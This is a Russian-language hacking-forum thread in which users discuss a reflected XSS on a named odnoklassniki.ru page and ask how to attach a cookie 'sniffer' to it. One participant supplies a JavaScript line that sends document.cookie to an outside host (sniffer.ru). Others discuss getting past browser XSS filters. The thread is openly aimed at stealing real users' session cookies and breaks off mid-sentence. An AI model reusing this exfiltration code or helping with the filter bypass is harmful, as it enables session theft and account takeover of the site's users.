Из соседней темы, взял эту пассивку.


_Spamer_ said:
Пассивная XSS odnoklassniki.ru
https://cards2.odnoklassniki.ru/index.html?ServiceDescr=XSS


Подставляя такое:

или

click me!

вылазит алерт.

Вопрос.. а как снифер сюда прикрутить ?

img = new Image(); img.src = "http://sniffer.ru/evil.gif?"+document.cookie;

йож said:

img = new Image(); img.src = "http://sniffer.ru/evil.gif?"+document.cookie;



Ну дело в том, что если подставлять alert(/xss/), то алерт не вылетает.. соответственно и на снифер нечего не приходит..

DavidRog said:
Ну дело в том, что если подставлять alert(/xss/), то алерт не вылетает.. соответственно и на снифер нечего не приходит..


Ты про обход фильтров что нибудь слышал?

DavidRog said:
Ну дело в том, что если подставлять alert(/xss/), то алерт не вылетает.. соответственно и на снифер нечего не приходит..


хром и ие фильтруют пассивки

какой браузер?

йож said:
какой браузер?


пробовал через FF и CHROME.

вот так alert(/xss/) в коде хтмл вроде все ровно, но алерт не вылазит.

пару лет назад все получалось, а щас нет.

подумал просто что есть какой-то вариант не в теги выполнять произвольный код. а например в